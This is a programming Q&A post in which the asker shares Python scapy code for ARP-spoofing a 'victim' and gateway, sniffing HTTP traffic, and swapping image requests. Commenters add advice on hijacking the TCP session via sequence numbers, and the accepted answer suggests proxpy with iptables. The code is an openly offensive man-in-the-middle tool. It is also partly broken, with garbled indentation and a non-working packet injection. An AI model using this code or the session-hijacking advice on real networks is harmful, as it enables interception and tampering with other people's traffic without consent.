# Python scapy sniffing replacing images

Tags: python, image, http, scapy, spoofing

A short explanation of what I am trying to do :)

I want to replace every picture within the http traffic with a specific one.

I start with arp spoofing to get into the traffic. Then I am checking if the packet contains http-raw data. If it does, I am gonna check if the request is an image-request. If it is an image-request I try to replace that request with my own.

Here is my code:

```
#!/usr/bin/python

from scapy.all import *
import threading 
import os

# Destination is the IP-Adress of the Victim
# Source ist the IP-Adress of the Gateway
# Opcode is Reply (2)
def VictimPoisoning() :
   VictimPacket = ARP(pdst=VictimIP, psrc=GatewayIP, op=2)
   while True :
       try:
           send(VictimPacket, verbose = 0)
       except KeyboardInterupt:
           sys.exit(1)

# Source ist the IP-Adress of the Gateway
# Destination is the IP-Adress of the Victim
# Opcode is Reply (2)
def GatewayPoisoning() :
   GatewayPacket = ARP(pdst=GatewayIP, psrc=VictimIP, op=2)
   while True:
       try:
           send(GatewayPacket, verbose = 0)
       except KeyboardInterupt:                     
           sys.exit(1)

    def TCPHttpExtract(pkt):
       if pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80 and pkt.getlayer(Raw):

       #This packet should be sent by every image request
       OwnPacket="GET /resources/css/mdr/global/img/iconFlash.jpg HTTP/1.1\nHost:   www.site.com\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0\nAccept: image/png,image/*;q=0.8,*/*;q=0.5\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nConnection: keep-alive"

       StringJPG=""
       StringPNG=""
       StringGIF=""
       StringPacket=""
       liste=[]     

       for line in pkt.getlayer(Raw) :
           liste.append(line)

       #Check if the requests contains an *.jpg, *.png, *.gif
       #Just check JPG - rest will be implemented later on
       StringPacket=re.findall('(\s\/.*?\s)', str(liste))
       StringJPG=re.findall('.*\.jpg', str(StringPacket))
       StringPNG=re.findall('.*\.png', str(StringPacket))
       StringGIF=re.findall('.*\.gif', str(StringPacket))
       if(StringJPG):
          send(OwnPacket)

      #Forward packets
      os.system('echo 1 > /proc/sys/net/ipv4/ip_forward') 


      print "\n----------------------------------------"
      VictimIP  = raw_input("Victim-IP:    ")
      GatewayIP = raw_input("Gateway-IP:   ")
      IFACE     = raw_input("Interface:    ")
      print "-----------------------------------------\n"

      VictimThread = []
      GatewayThread = []    

      print "Start poisoning the Victim ... \n"

      while True:   
         try:
            # VictimThread      
            VicPoison = threading.Thread(target=VictimPoisoning)
            VicPoison.setDaemon(True)
            VictimThread.append(VicPoison)
            VicPoison.start()       

            # GatewayThread
            GWayPoison = threading.Thread(target=GatewayPoisoning)
            GWayPoison.setDaemon(True)
            GatewayThread.append(GWayPoison)
            GWayPoison.start()

            pkt=sniff(iface=IFACE, prn=TCPHttpExtract)

            # Cancel with STRG+C
         except KeyboardInterupt:                     
            sys.exit(1)
```

The arp spoofing is working and also the image regex and the sending of the packet but the browser won t change/get this image. Do I have to destroy the original packet first? I don t want to use ettercap, I want to do it with python here :)

*Sorry for that bad formating.

Thanks to you all for your help! :)

Comment: In order to do this, you're going to have to intercept the traffic going to the host, modify it, and send the modified traffic to the host. That means you're going to need 2 ethernet interfaces: one that is exposed to the gateway, and one that is isolated. You'd listen on the gateway interface and then forward packets to the isolated interface.

Comment: Also, you can't just send a random packet with the appropriate HTTP protocol layer. The browser interacts with the remote host via an established TCP session. You have to hijack that specific session. You're going to want to intercept the TCP traffic immediately after the three-way handshake so you can grab the appropriate sequence numbers and go from there.

Comment: Thanks for this explanation and this should have been clear to me :) I am gonna try setting up another interface. Thanks :)

Comment: Do I really need a different interface or is it possible with one interface and IP-tables like here? http://www.backtrack-linux.org/forums/showthread.php?t=39169 ? Ettercap got a filter which does this job: http://www.irongeek.com/i.php?page=security/ettercapfilter.

Answer (score 0, accepted):

The answer to this question is proxpy in combination with ip-tables.